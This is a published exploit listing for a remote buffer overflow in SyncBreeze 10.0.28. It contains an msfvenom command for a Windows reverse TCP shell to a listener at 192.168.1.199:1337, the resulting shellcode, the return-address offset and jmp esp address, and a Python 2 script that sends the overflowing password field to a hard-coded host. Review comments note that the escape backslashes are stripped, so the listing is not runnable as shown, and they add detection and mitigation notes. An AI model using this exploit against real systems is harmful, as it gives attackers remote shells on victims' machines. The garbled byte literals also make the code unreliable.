Authored by Abdessalam King

SyncBreeze version 10.0.28 suffers from a remote buffer overflow vulnerability.

# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
# Date: 18-Sep-2020
# Exploit Author: Abdessalam king(A.salam)
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
# Version: 10.0.28
# Tested on: Windows 7, Windows XP, Windows 10
#72413372 [*] Exact match at offset 520
#jmp esp FFE4 xffxe4
#!mona modules
#!mona find -s "xffxe4" -m libspp.dll
#address esp => 10090C83
#badchars ==> "x00x0ax0dx25x26x2bx3d"
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c
-b "x00x0ax0dx25x26x2bx3d" EXITFUNC=thread
#!/usr/bin/python
import socket

# Proof-of-concept for the SyncBreeze 10.0.28 login handler: a single HTTP
# POST to /login whose `password` field overruns a fixed-size buffer.
# NOTE(review): the script is Python 2 (`print` statement, a str passed to
# socket.send) and, as reproduced here, the backslashes of every `\x..` and
# `\r\n` escape have been stripped, so the string literals below are plain
# ASCII text rather than the intended bytes -- this listing documents the
# technique; it is not a runnable copy.
#
# `shell` holds the stage described by the msfvenom line in the header above;
# the author's listener address/port are baked into these bytes, so they are
# specific to that lab network.
shell =""
shell +="xbax4bx38x98x39xddxc7xd9x74x24xf4x5fx33xc9xb1"
shell +="x53x83xefxfcx31x57x10x03x57x10xa9xcdx64xd1xaf"
shell +="x2ex95x22xcfxa7x70x13xcfxdcxf1x04xffx97x54xa9"
shell +="x74xf5x4cx3axf8xd2x63x8bxb6x04x4dx0cxeax75xcc"
shell +="x8exf0xa9x2exaex3bxbcx2fxf7x21x4dx7dxa0x2exe0"
shell +="x92xc5x7ax39x18x95x6bx39xfdx6ex8ax68x50xe4xd5"
shell +="xaax52x29x6exe3x4cx2ex4axbdxe7x84x21x3cx2exd5"
shell +="xcax93x0fxd9x39xedx48xdexa1x98xa0x1cx5cx9bx76"
shell +="x5exbax2ex6dxf8x49x88x49xf8x9ex4fx19xf6x6bx1b"
shell +="x45x1bx6axc8xfdx27xe7xefxd1xa1xb3xcbxf5xeax60"
shell +="x75xafx56xc7x8axafx38xb8x2exbbxd5xadx42xe6xb1"
shell +="x02x6fx19x42x0cxf8x6ax70x93x52xe5x38x5cx7dxf2"
shell +="x3fx77x39x6cxbex77x3axa4x05x23x6axdexacx4bxe1"
shell +="x1ex50x9ex9cx15xf7x70x83xd7x6dx71x29x2ax1ax9b"
shell +="xa2xf5x3axa4x68x9exd3x58x93xbexb3xd5x75xaaxa3"
shell +="xb3x2ex43x06xe0xe6xf4x79xc3x8cx3bxf0xb3xd9xd3"
shell +="x4cxaaxdexdcx4cxf9x48x4bxc7xedx4cx6axd8x38xe5"
shell +="xfbx4fxb7x64x49xf1xc8xacx3bxf1x5cx4bxeaxa6xc8"
shell +="x51xcbx81x57xa9x3ex92x9fx55xbfxb8xd4x60x55x83"
shell +="x82x8cxb9x03x52xdbxd3x03x3axbbx87x57x5fxc4x1d"
shell +="xc4xccx51x9exbdxa1xf2xf6x43x9cx35x59xbbxcbx45"
shell +="x9ex43x8dx4ex5ex87x58x97x15xeex59xacx36xedx77"
shell +="xd9xdexa8x12x60x83x4axc9xa7xbaxc8xfbx57x39xd0"
shell +="x8ex52x05x56x63x2fx16x33x83x9cx17x16";


# Request-body layout, following the offsets recorded in the header notes:
#   520 filler bytes -> reaches the saved return address ("Exact match at offset 520")
#   4 bytes          -> 0x10090C83 written little-endian, the `jmp esp` found in libspp.dll
#   20 NOP bytes     -> landing pad for the jump
#   shell            -> the staged payload above
#   trailing padding -> keeps the field at a constant 1400 bytes
# Detection: a POST /login whose `password` field is roughly 1.4 KB long and
# contains non-printable bytes is the observable signature of this request.
# Mitigation: restrict network access to the SyncBreeze web interface and
# check the vendor for a release later than 10.0.28.
payload = "username=AAAAA&password="+"A"*520+"x83x0cx09x10"+ "x90" *
20 + shell +"x90"*(1400-520-4-20-len(shell))
# Hand-built HTTP/1.1 POST. Content-Length is derived from the body so the
# server reads the entire field. The target host 192.168.1.20 is hard-coded
# here and repeated in the Host and Referer headers.
req =""
req += "POST /login HTTP/1.1rn"
req += "Host: 192.168.1.20rn"
req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0rn"
req += "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
req += "Accept-Language: en-US,en;q=0.5rn"
req += "Accept-Encoding: gzip, deflatern"
req += "Referer: http://192.168.1.20/loginrn"
req += "Content-Type: application/x-www-form-urlencodedrn"
req += "Content-Length: "+str(len(payload))+"rn"
req += "Connection: keep-alivern"
req += "Upgrade-Insecure-Requests: 1rn"
req += "rn"
req += payload
# print req
# One TCP connection to the web interface on port 80: send the request, print
# up to 1024 bytes of whatever the server answers, then close.
# NOTE(review): there is no try/finally, so the socket is not closed if
# connect() or send() raises.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.20",80))
s.send(req)
print s.recv(1024)

s.close()